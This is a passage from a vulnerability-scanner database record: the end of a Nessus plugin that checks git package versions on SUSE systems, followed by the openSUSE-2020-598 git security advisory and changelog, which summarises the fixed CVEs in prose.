flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-debugsource-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-email-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-gui-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-p4-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-svn-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-svn-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-web-2.26.1-3.25.2\")) flag++;\nif 
(rpm_check(release:\"SLES15\", sp:\"1\", reference:\"gitk-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-arch-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-core-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-core-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-credential-gnome-keyring-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-credential-gnome-keyring-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-credential-libsecret-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-credential-libsecret-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-cvs-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-daemon-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-daemon-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-debugsource-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-email-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-gui-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-p4-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-svn-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-svn-debuginfo-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"git-web-2.26.1-3.25.2\")) flag++;\nif (rpm_check(release:\"SLED15\", 
sp:\"1\", reference:\"gitk-2.26.1-3.25.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-17T14:16:36", "description": "This update for git fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2020-11008: Specially crafted URLs may have tricked the credentials helper to providing credential information that is not appropriate for the protocol in use and host being contacted (bsc#1169936)\n\ngit was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\n - Fix git-daemon not starting after conversion from sysvinit to systemd service (bsc#1169605).\n\n - CVE-2020-5260: Specially crafted URLs with newline characters could have been used to make the Git client to send credential information for a wrong host to the attacker's site bsc#1168930\n\ngit 2.26.0 (bsc#1167890, jsc#SLE-11608) :\n\n - 'git rebase' now uses a different backend that is based on the 'merge' machinery by default. 
The 'rebase.backend' configuration variable reverts to old behaviour when set to 'apply'\n\n - Improved handling of sparse checkouts\n\n - Improvements to many commands and internal features\n\ngit 2.25.2 :\n\n - bug fixes to various subcommands in specific operations\n\ngit 2.25.1 :\n\n - 'git commit' now honors advise.statusHints\n\n - various updates, bug fixes and documentation updates\n\ngit 2.25.0\n\n - The branch description ('git branch --edit-description') has been used to fill the body of the cover letters by the format-patch command; this has been enhanced so that the subject can also be filled.\n\n - A few commands learned to take the pathspec from the standard input or a named file, instead of taking it as the command line arguments, with the '--pathspec-from-file' option.\n\n - Test updates to prepare for SHA-2 transition continues.\n\n - Redo 'git name-rev' to avoid recursive calls.\n\n - When all files from some subdirectory were renamed to the root directory, the directory rename heuristics would fail to detect that as a rename/merge of the subdirectory to the root directory, which has been corrected.\n\n - HTTP transport had possible allocator/deallocator mismatch, which has been corrected.\n\ngit 2.24.1 :\n\n - CVE-2019-1348: The --export-marks option of fast-import is exposed also via the in-stream command feature export-marks=... 
and it allows overwriting arbitrary paths (bsc#1158785)\n\n - CVE-2019-1349: on Windows, when submodules are cloned recursively, under certain circumstances Git could be fooled into using the same Git directory twice (bsc#1158787)\n\n - CVE-2019-1350: Incorrect quoting of command-line arguments allowed remote code execution during a recursive clone in conjunction with SSH URLs (bsc#1158788)\n\n - CVE-2019-1351: on Windows mistakes drive letters outside of the US-English alphabet as relative paths (bsc#1158789)\n\n - CVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams (bsc#1158790)\n\n - CVE-2019-1353: when run in the Windows Subsystem for Linux while accessing a working directory on a regular Windows drive, none of the NTFS protections were active (bsc#1158791)\n\n - CVE-2019-1354: on Windows refuses to write tracked files with filenames that contain backslashes (bsc#1158792)\n\n - CVE-2019-1387: Recursive clones vulnerability that is caused by too-lax validation of submodule names, allowing very targeted attacks via remote code execution in recursive clones (bsc#1158793)\n\n - CVE-2019-19604: a recursive clone followed by a submodule update could execute code contained within the repository without the user explicitly having asked for that (bsc#1158795)\n\ngit 2.24.0\n\n - The command line parser learned '--end-of-options' notation.\n\n - A mechanism to affect the default setting for a (related) group of configuration variables is introduced.\n\n - 'git fetch' learned '--set-upstream' option to help those who first clone from their private fork they intend to push to, add the true upstream via 'git remote add' and then 'git fetch' from it.\n\n - fixes and improvements to UI, workflow and features, bash completion fixes\n\ngit 2.23.0 :\n\n - The '--base' option of 'format-patch' computed the patch-ids for prerequisite patches in an unstable way, which has been updated to compute in a way that is compatible with 'git patch-id\n\n --stable'.\n\n - 
The 'git log' command by default behaves as if the\n --mailmap option was given.\n\n - fixes and improvements to UI, workflow and features\n\ngit 2.22.1\n\n - A relative pathname given to 'git init --template=<path> <repo>' ought to be relative to the directory 'git init' gets invoked in, but it instead was made relative to the repository, which has been corrected.\n\n - 'git worktree add' used to fail when another worktree connected to the same repository was corrupt, which has been corrected.\n\n - 'git am -i --resolved' segfaulted after trying to see a commit as if it were a tree, which has been corrected.\n\n - 'git merge --squash' is designed to update the working tree and the index without creating the commit, and this cannot be countermanded by adding the '--commit' option;\n the command now refuses to work when both options are given.\n\n - Update to Unicode 12.1 width table.\n\n - 'git request-pull' learned to warn when the ref we ask them to pull from in the local repository and in the published repository are different.\n\n - 'git fetch' into a lazy clone forgot to fetch base objects that are necessary to complete delta in a thin packfile, which has been corrected.\n\n - The URL decoding code has been updated to avoid going past the end of the string while parsing %-<hex>-<hex> sequence.\n\n - 'git clean' silently skipped a path when it cannot lstat() it; now it gives a warning.\n\n - 'git rm' to resolve a conflicted path leaked an internal message 'needs merge' before actually removing the path, which was confusing. 
This has been corrected.\n\n - Many more bugfixes and code cleanups.\n\n - removal of SuSEfirewall2 service, since SuSEfirewall2 has been replaced by firewalld.\n\n - partial fix for git instaweb giving 500 error (bsc#1112230)\n\ngit 2.22.0 \n\n - The filter specification '--filter=sparse:path=<path>' used to create a lazy/partial clone has been removed.\n Using a blob that is part of the project as sparse specification is still supported with the '--filter=sparse:oid=<blob>' option\n\n - 'git checkout --no-overlay' can be used to trigger a new mode of checking out paths out of the tree-ish, that allows paths that match the pathspec that are in the current index and working tree and are not in the tree-ish.\n\n - Four new configuration variables (author,committer).(name,email) have been introduced to override user.(name,email) in more specific cases.\n\n - 'git branch' learned a new subcommand '--show-current'.\n\n - The command line completion (in contrib/) has been taught to complete more subcommand parameters.\n\n - The completion helper code now pays attention to repository-local configuration (when available), which allows --list-cmds to honour a repository specific setting of completion.commands, for example.\n\n - The list of conflicted paths shown in the editor while concluding a conflicted merge was shown above the scissors line when the clean-up mode is set to 'scissors', even though it was commented out just like the list of updated paths and other information to help the user explain the merge better.\n\n - 'git rebase' that was reimplemented in C did not set ORIG_HEAD correctly, which has been corrected.\n\n - 'git worktree add' used to do a 'find an available name with stat and then mkdir', which is race-prone. This has been fixed by using mkdir and reacting to EEXIST in a loop. \n\n - Move to DocBook 5.x. 
Asciidoctor 2.x no longer supports the legacy DocBook 4.5 format.\n\n - update git-web AppArmor profile for bash and tar usrMerge (bsc#1132350)\n\ngit 2.21.0\n\n - Historically, the '-m' (mainline) option can only be used for 'git cherry-pick' and 'git revert' when working with a merge commit. This version of Git no longer warns or errors out when working with a single-parent commit, as long as the argument to the '-m' option is 1 (i.e. it has only one parent, and the request is to pick or revert relative to that first parent). Scripts that relied on the behaviour may get broken with this change.\n\n - Small fixes and features for fast-export and fast-import.\n\n - The 'http.version' configuration variable can be used with recent enough versions of cURL library to force the version of HTTP used to talk when fetching and pushing.\n\n - 'git push $there $src:$dst' rejects when $dst is not a fully qualified refname and it is not clear what the end user meant.\n\n - Update 'git multimail' from the upstream.\n\n - A new date format '--date=human' that morphs its output depending on how far the time is from the current time has been introduced. '--date=auto:human' can be used to use this new format (or any existing format) when the output is going to the pager or to the terminal, and otherwise the default format.\n\n - Fix worktree creation race (bsc#1114225).\n\n - add shadow build dependency to the -daemon subpackage.\n\ngit 2.20.1 :\n\n - portability fixes\n\n - 'git help -a' did not work well when an overly long alias was defined\n\n - no longer squelched an error message when the run_command API failed to run a missing command\n\ngit 2.20.0\n\n - 'git help -a' now gives verbose output (same as 'git help -av'). 
Those who want the old output may say 'git help --no-verbose -a'.\n\n - 'git send-email' learned to grab address-looking string on any trailer whose name ends with '-by'.\n\n - 'git format-patch' learned new '--interdiff' and '--range-diff' options to explain the difference between this version and the previous attempt in the cover letter (or after the three-dashes as a comment).\n\n - Developer builds now use -Wunused-function compilation option.\n\n - Fix a bug in which the same path could be registered under multiple worktree entries if the path was missing (for instance, was removed manually). Also, as a convenience, expand the number of cases in which --force is applicable.\n\n - The overly large Documentation/config.txt file has been split into a million little pieces. This potentially allows each individual piece to be included into the manual page of the command it affects more easily.\n\n - Malformed or crafted data in packstream can make our code attempt to read or write past the allocated buffer and abort, instead of reporting an error, which has been fixed.\n\n - Fix for a long-standing bug that leaves the index file corrupt when it shrinks during a partial commit.\n\n - 'git merge' and 'git pull' that merges into an unborn branch used to completely ignore '--verify-signatures', which has been corrected.\n\n - ...and many more features and fixes\n\ngit 2.19.2 :\n\n - various bug fixes for multiple subcommands and operations\n\ngit 2.19.1 :\n\n - CVE-2018-17456: Specially crafted .gitmodules files may have allowed arbitrary code execution when the repository is cloned with --recurse-submodules (bsc#1110949)\n\ngit 2.19.0 :\n\n - 'git diff' compares the index and the working tree. For paths added with intent-to-add bit, the command shows the full contents of them as added, but the paths themselves were not marked as new files. 
They are now shown as new by default.\n\n - 'git apply' learned the '--intent-to-add' option so that an otherwise working-tree-only application of a patch will add new paths to the index marked with the 'intent-to-add' bit.\n\n - 'git grep' learned the '--column' option that gives not just the line number but the column number of the hit.\n\n - The '-l' option in 'git branch -l' is an unfortunate short-hand for '--create-reflog', but many users, both old and new, somehow expect it to be something else, perhaps '--list'. This step warns when '-l' is used as a short-hand for '--create-reflog' and warns about the future repurposing of it when it is used.\n\n - The userdiff pattern for .php has been updated.\n\n - The content-transfer-encoding of the message 'git send-email' sends out by default was 8bit, which can cause trouble when there is an overlong line to bust RFC 5322/2822 limit. A new option 'auto' to automatically switch to quoted-printable when there is such a line in the payload has been introduced and is made the default.\n\n - 'git checkout' and 'git worktree add' learned to honor checkout.defaultRemote when auto-vivifying a local branch out of a remote tracking branch in a repository with multiple remotes that have tracking branches that share the same names. (merge 8d7b558bae ab/checkout-default-remote later to maint).\n\n - 'git grep' learned the '--only-matching' option.\n\n - 'git rebase --rebase-merges' mode now handles octopus merges as well.\n\n - Add a server-side knob to skip commits in exponential/Fibonacci stride in an attempt to cover a wider swath of history with a smaller number of iterations, potentially accepting a larger packfile transfer, instead of going back one commit at a time during common ancestor discovery during the 'git fetch' transaction. 
(merge 42cc7485a2 jt/fetch-negotiator-skipping later to maint).\n\n - A new configuration variable core.usereplacerefs has been added, primarily to help server installations that want to ignore the replace mechanism altogether.\n\n - Teach 'git tag -s' etc. a few configuration variables (gpg.format that can be set to 'openpgp' or 'x509', and gpg.<format>.program that is used to specify what program to use to deal with the format) to allow x.509 certs with CMS via 'gpgsm' to be used instead of openpgp via 'gnupg'.\n\n - Many more strings are prepared for l10n.\n\n - 'git p4 submit' learns to ask its own pre-submit hook if it should continue with submitting.\n\n - The test performed at the receiving end of 'git push' to prevent bad objects from entering repository can be customized via receive.fsck.* configuration variables;\n we now have gained a counterpart to do the same on the 'git fetch' side, with fetch.fsck.* configuration variables.\n\n - 'git pull --rebase=interactive' learned 'i' as a short-hand for 'interactive'.\n\n - 'git instaweb' has been adjusted to run better with newer Apache on RedHat based distros.\n\n - 'git range-diff' is a reimplementation of 'git tbdiff' that lets us compare individual patches in two iterations of a topic.\n\n - The sideband code learned to optionally paint selected keywords at the beginning of incoming lines on the receiving end.\n\n - 'git branch --list' learned to take the default sort order from the 'branch.sort' configuration variable, just like 'git tag --list' pays attention to 'tag.sort'.\n\n - 'git worktree' command learned '--quiet' option to make it less verbose.\n\ngit 2.18.0 :\n\n - improvements to rename detection logic\n\n - When built with more recent cURL, GIT_SSL_VERSION can now specify 'tlsv1.3' as its value.\n\n - 'git mergetools' learned talking to guiffy.\n\n - various other workflow improvements and fixes\n\n - performance improvements and other developer visible fixes\n\ngit 2.17.1\n\n - Submodule 
'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name. We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235, bsc#1095219)\n\n - It was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233, bsc#1095218)\n\n - Support on the server side to reject pushes to repositories that attempt to create such problematic .gitmodules file etc. as tracked contents, to help hosting sites protect their customers by preventing malicious contents from spreading.\n\ngit 2.17.0 :\n\n - 'diff' family of commands learned '--find-object=<object-id>' option to limit the findings to changes that involve the named object.\n\n - 'git format-patch' learned to give 72-cols to diffstat, which is consistent with other line length limits the subcommand uses for its output meant for e-mails.\n\n - The log from 'git daemon' can be redirected with a new option; one relevant use case is to send the log to standard error (instead of syslog) when running it from inetd.\n\n - 'git rebase' learned to take '--allow-empty-message' option.\n\n - 'git am' has learned the '--quit' option, in addition to the existing '--abort' option; having the pair mirrors a few other commands like 'rebase' and 'cherry-pick'.\n\n - 'git worktree add' learned to run the post-checkout hook, just like 'git clone' runs it upon the initial checkout.\n\n - 'git tag' learned an explicit '--edit' option that allows the message given via '-m' and '-F' to be further edited.\n\n - 'git fetch --prune-tags' may be used as a handy short-hand for getting rid of stale tags that are locally held.\n\n - The new '--show-current-patch' option gives an end-user facing way to get the diff being applied when 'git rebase' (and 'git am') stops with a conflict.\n\n - 'git add -p' used to offer 
'/' (look for a matching hunk) as a choice, even when there was only one hunk, which has been corrected. Also the single-key help is now given only for keys that are enabled (e.g. help for '/' won't be shown when there is only one hunk).\n\n - Since Git 1.7.9, 'git merge' defaulted to --no-ff (i.e.\n even when the side branch being merged is a descendant of the current commit, create a merge commit instead of fast-forwarding) when merging a tag object. This was an appropriate default for integrators who pull signed tags from their downstream contributors, but caused unnecessary merges when used by downstream contributors who habitually 'catch up' their topic branches with tagged releases from the upstream. Update 'git merge' to default to --no-ff only when merging a tag object that does *not* sit at its usual place in refs/tags/ hierarchy, and allow fast-forwarding otherwise, to mitigate the problem.\n\n - 'git status' can spend a lot of cycles to compute the relation between the current branch and its upstream, which can now be disabled with '--no-ahead-behind' option.\n\n - 'git diff' and friends learned funcname patterns for Go language source files.\n\n - 'git send-email' learned '--reply-to=<address>' option.\n\n - Funcname pattern used for C# now recognizes 'async' keyword.\n\n - In a way similar to how 'git tag' learned to honor the pager setting only in the list mode, 'git config' learned to ignore the pager setting when it is used for setting values (i.e. 
when the purpose of the operation is not to 'show').\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : git (openSUSE-2020-598)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-15298", "CVE-2018-11233", "CVE-2018-11235", "CVE-2018-17456", "CVE-2019-1348", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1351", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2019-19604", "CVE-2020-11008", "CVE-2020-5260"], "modified": "2022-05-16T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:git", "p-cpe:/a:novell:opensuse:git-arch", "p-cpe:/a:novell:opensuse:git-core", "p-cpe:/a:novell:opensuse:git-core-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring", "p-cpe:/a:novell:opensuse:git-credential-gnome-keyring-debuginfo", "p-cpe:/a:novell:opensuse:git-credential-libsecret", "p-cpe:/a:novell:opensuse:git-credential-libsecret-debuginfo", "p-cpe:/a:novell:opensuse:git-cvs", "p-cpe:/a:novell:opensuse:git-daemon", "p-cpe:/a:novell:opensuse:git-daemon-debuginfo", "p-cpe:/a:novell:opensuse:git-debuginfo", "p-cpe:/a:novell:opensuse:git-debugsource", "p-cpe:/a:novell:opensuse:git-email", "p-cpe:/a:novell:opensuse:git-gui", "p-cpe:/a:novell:opensuse:git-p4", "p-cpe:/a:novell:opensuse:git-svn", "p-cpe:/a:novell:opensuse:git-svn-debuginfo", "p-cpe:/a:novell:opensuse:git-web", "p-cpe:/a:novell:opensuse:gitk", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-598.NASL", "href": "https://www.tenable.com/plugins/nessus/136311", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-598.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136311);\n 
script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/16\");\n\n script_cve_id(\"CVE-2017-15298\", \"CVE-2018-11233\", \"CVE-2018-11235\", \"CVE-2018-17456\", \"CVE-2019-1348\", \"CVE-2019-1349\", \"CVE-2019-1350\", \"CVE-2019-1351\", \"CVE-2019-1352\", \"CVE-2019-1353\", \"CVE-2019-1354\", \"CVE-2019-1387\", \"CVE-2019-19604\", \"CVE-2020-11008\", \"CVE-2020-5260\");\n\n script_name(english:\"openSUSE Security Update : git (openSUSE-2020-598)\");\n script_summary(english:\"Check for the openSUSE-2020-598 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for git fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2020-11008: Specially crafted URLs may have tricked\n the credentials helper to providing credential\n information that is not appropriate for the protocol in\n use and host being contacted (bsc#1169936)\n\ngit was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\n - Fix git-daemon not starting after conversion from\n sysvinit to systemd service (bsc#1169605).\n\n - CVE-2020-5260: Specially crafted URLs with newline\n characters could have been used to make the Git client\n to send credential information for a wrong host to the\n attacker's site bsc#1168930\n\ngit 2.26.0 (bsc#1167890, jsc#SLE-11608) :\n\n - 'git rebase' now uses a different backend that is based\n on the 'merge' machinery by default. 
The\n 'rebase.backend' configuration variable reverts to old\n behaviour when set to 'apply'\n\n - Improved handling of sparse checkouts\n\n - Improvements to many commands and internal features\n\ngit 2.25.2 :\n\n - bug fixes to various subcommands in specific operations\n\ngit 2.25.1 :\n\n - 'git commit' now honors advise.statusHints\n\n - various updates, bug fixes and documentation updates\n\ngit 2.25.0\n\n - The branch description ('git branch --edit-description')\n has been used to fill the body of the cover letters by\n the format-patch command; this has been enhanced so that\n the subject can also be filled.\n\n - A few commands learned to take the pathspec from the\n standard input or a named file, instead of taking it as\n the command line arguments, with the\n '--pathspec-from-file' option.\n\n - Test updates to prepare for SHA-2 transition continues.\n\n - Redo 'git name-rev' to avoid recursive calls.\n\n - When all files from some subdirectory were renamed to\n the root directory, the directory rename heuristics\n would fail to detect that as a rename/merge of the\n subdirectory to the root directory, which has been\n corrected.\n\n - HTTP transport had possible allocator/deallocator\n mismatch, which has been corrected.\n\ngit 2.24.1 :\n\n - CVE-2019-1348: The --export-marks option of fast-import\n is exposed also via the in-stream command feature\n export-marks=... 
and it allows overwriting arbitrary\n paths (bsc#1158785)\n\n - CVE-2019-1349: on Windows, when submodules are cloned\n recursively, under certain circumstances Git could be\n fooled into using the same Git directory twice\n (bsc#1158787)\n\n - CVE-2019-1350: Incorrect quoting of command-line\n arguments allowed remote code execution during a\n recursive clone in conjunction with SSH URLs\n (bsc#1158788)\n\n - CVE-2019-1351: on Windows mistakes drive letters outside\n of the US-English alphabet as relative paths\n (bsc#1158789)\n\n - CVE-2019-1352: on Windows was unaware of NTFS Alternate\n Data Streams (bsc#1158790)\n\n - CVE-2019-1353: when run in the Windows Subsystem for\n Linux while accessing a working directory on a regular\n Windows drive, none of the NTFS protections were active\n (bsc#1158791)\n\n - CVE-2019-1354: on Windows refuses to write tracked files\n with filenames that contain backslashes (bsc#1158792)\n\n - CVE-2019-1387: Recursive clones vulnerability that is\n caused by too-lax validation of submodule names,\n allowing very targeted attacks via remote code execution\n in recursive clones (bsc#1158793)\n\n - CVE-2019-19604: a recursive clone followed by a\n submodule update could execute code contained within the\n repository without the user explicitly having asked for\n that (bsc#1158795)\n\ngit 2.24.0\n\n - The command line parser learned '--end-of-options'\n notation.\n\n - A mechanism to affect the default setting for a\n (related) group of configuration variables is\n introduced.\n\n - 'git fetch' learned '--set-upstream' option to help\n those who first clone from their private fork they\n intend to push to, add the true upstream via 'git remote\n add' and then 'git fetch' from it.\n\n - fixes and improvements to UI, workflow and features,\n bash completion fixes\n\ngit 2.23.0 :\n\n - The '--base' option of 'format-patch' computed the\n patch-ids for prerequisite patches in an unstable way,\n which has been updated to compute in a way 
that is\n compatible with 'git patch-id\n\n --stable'.\n\n - The 'git log' command by default behaves as if the\n --mailmap option was given.\n\n - fixes and improvements to UI, workflow and features\n\ngit 2.22.1\n\n - A relative pathname given to 'git init --template=<path>\n <repo>' ought to be relative to the directory 'git init'\n gets invoked in, but it instead was made relative to the\n repository, which has been corrected.\n\n - 'git worktree add' used to fail when another worktree\n connected to the same repository was corrupt, which has\n been corrected.\n\n - 'git am -i --resolved' segfaulted after trying to see a\n commit as if it were a tree, which has been corrected.\n\n - 'git merge --squash' is designed to update the working\n tree and the index without creating the commit, and this\n cannot be countermanded by adding the '--commit' option;\n the command now refuses to work when both options are\n given.\n\n - Update to Unicode 12.1 width table.\n\n - 'git request-pull' learned to warn when the ref we ask\n them to pull from in the local repository and in the\n published repository are different.\n\n - 'git fetch' into a lazy clone forgot to fetch base\n objects that are necessary to complete delta in a thin\n packfile, which has been corrected.\n\n - The URL decoding code has been updated to avoid going\n past the end of the string while parsing %-<hex>-<hex>\n sequence.\n\n - 'git clean' silently skipped a path when it cannot\n lstat() it; now it gives a warning.\n\n - 'git rm' to resolve a conflicted path leaked an internal\n message 'needs merge' before actually removing the path,\n which was confusing. 
This has been corrected.\n\n - Many more bugfixes and code cleanups.\n\n - removal of SuSEfirewall2 service, since SuSEfirewall2\n has been replaced by firewalld.\n\n - partial fix for git instaweb giving 500 error\n (bsc#1112230)\n\ngit 2.22.0 \n\n - The filter specification '--filter=sparse:path=<path>'\n used to create a lazy/partial clone has been removed.\n Using a blob that is part of the project as sparse\n specification is still supported with the\n '--filter=sparse:oid=<blob>' option\n\n - 'git checkout --no-overlay' can be used to trigger a new\n mode of checking out paths out of the tree-ish, that\n allows paths that match the pathspec that are in the\n current index and working tree and are not in the\n tree-ish.\n\n - Four new configuration variables\n (author,committer).(name,email) have been introduced to\n override user.(name,email) in more specific cases.\n\n - 'git branch' learned a new subcommand '--show-current'.\n\n - The command line completion (in contrib/) has been\n taught to complete more subcommand parameters.\n\n - The completion helper code now pays attention to\n repository-local configuration (when available), which\n allows --list-cmds to honour a repository specific\n setting of completion.commands, for example.\n\n - The list of conflicted paths shown in the editor while\n concluding a conflicted merge was shown above the\n scissors line when the clean-up mode is set to\n 'scissors', even though it was commented out just like\n the list of updated paths and other information to help\n the user explain the merge better.\n\n - 'git rebase' that was reimplemented in C did not set\n ORIG_HEAD correctly, which has been corrected.\n\n - 'git worktree add' used to do a 'find an available name\n with stat and then mkdir', which is race-prone. This has\n been fixed by using mkdir and reacting to EEXIST in a\n loop. \n\n - Move to DocBook 5.x. 
Asciidoctor 2.x no longer supports\n the legacy DocBook 4.5 format.\n\n - update git-web AppArmor profile for bash and tar\n usrMerge (bsc#1132350)\n\ngit 2.21.0\n\n - Historically, the '-m' (mainline) option can only be\n used for 'git cherry-pick' and 'git revert' when working\n with a merge commit. This version of Git no longer warns\n or errors out when working with a single-parent commit,\n as long as the argument to the '-m' option is 1 (i.e. it\n has only one parent, and the request is to pick or\n revert relative to that first parent). Scripts that\n relied on the behaviour may get broken with this change.\n\n - Small fixes and features for fast-export and\n fast-import.\n\n - The 'http.version' configuration variable can be used\n with recent enough versions of cURL library to force the\n version of HTTP used to talk when fetching and pushing.\n\n - 'git push $there $src:$dst' rejects when $dst is not a\n fully qualified refname and it is not clear what the end\n user meant.\n\n - Update 'git multimail' from the upstream.\n\n - A new date format '--date=human' that morphs its output\n depending on how far the time is from the current time\n has been introduced. '--date=auto:human' can be used to\n use this new format (or any existing format) when the\n output is going to the pager or to the terminal, and\n otherwise the default format.\n\n - Fix worktree creation race (bsc#1114225).\n\n - add shadow build dependency to the -daemon subpackage.\n\ngit 2.20.1 :\n\n - portability fixes\n\n - 'git help -a' did not work well when an overly long\n alias was defined\n\n - no longer squelched an error message when the\n run_command API failed to run a missing command\n\ngit 2.20.0\n\n - 'git help -a' now gives verbose output (same as 'git\n help -av'). 
Those who want the old output may say 'git\n help --no-verbose -a'..\n\n - 'git send-email' learned to grab address-looking string\n on any trailer whose name ends with '-by'.\n\n - 'git format-patch' learned new '--interdiff' and\n '--range-diff' options to explain the difference between\n this version and the previous attempt in the cover\n letter (or after the three-dashes as a comment).\n\n - Developer builds now use -Wunused-function compilation\n option.\n\n - Fix a bug in which the same path could be registered\n under multiple worktree entries if the path was missing\n (for instance, was removed manually). Also, as a\n convenience, expand the number of cases in which --force\n is applicable.\n\n - The overly large Documentation/config.txt file have been\n split into million little pieces. This potentially\n allows each individual piece to be included into the\n manual page of the command it affects more easily.\n\n - Malformed or crafted data in packstream can make our\n code attempt to read or write past the allocated buffer\n and abort, instead of reporting an error, which has been\n fixed.\n\n - Fix for a long-standing bug that leaves the index file\n corrupt when it shrinks during a partial commit.\n\n - 'git merge' and 'git pull' that merges into an unborn\n branch used to completely ignore '--verify-signatures',\n which has been corrected.\n\n - ...and much more features and fixes\n\ngit 2.19.2 :\n\n - various bug fixes for multiple subcommands and\n operations\n\ngit 2.19.1 :\n\n - CVE-2018-17456: Specially crafted .gitmodules files may\n have allowed arbitrary code execution when the\n repository is cloned with --recurse-submodules\n (bsc#1110949)\n\ngit 2.19.0 :\n\n - 'git diff' compares the index and the working tree. For\n paths added with intent-to-add bit, the command shows\n the full contents of them as added, but the paths\n themselves were not marked as new files. 
They are now\n shown as new by default.\n\n - 'git apply' learned the '--intent-to-add' option so that\n an otherwise working-tree-only application of a patch\n will add new paths to the index marked with the\n 'intent-to-add' bit.\n\n - 'git grep' learned the '--column' option that gives not\n just the line number but the column number of the hit.\n\n - The '-l' option in 'git branch -l' is an unfortunate\n short-hand for '--create-reflog', but many users, both\n old and new, somehow expect it to be something else,\n perhaps '--list'. This step warns when '-l' is used as a\n short-hand for '--create-reflog' and warns about the\n future repurposing of the it when it is used.\n\n - The userdiff pattern for .php has been updated.\n\n - The content-transfer-encoding of the message 'git\n send-email' sends out by default was 8bit, which can\n cause trouble when there is an overlong line to bust RFC\n 5322/2822 limit. A new option 'auto' to automatically\n switch to quoted-printable when there is such a line in\n the payload has been introduced and is made the default.\n\n - 'git checkout' and 'git worktree add' learned to honor\n checkout.defaultRemote when auto-vivifying a local\n branch out of a remote tracking branch in a repository\n with multiple remotes that have tracking branches that\n share the same names. (merge 8d7b558bae\n ab/checkout-default-remote later to maint).\n\n - 'git grep' learned the '--only-matching' option.\n\n - 'git rebase --rebase-merges' 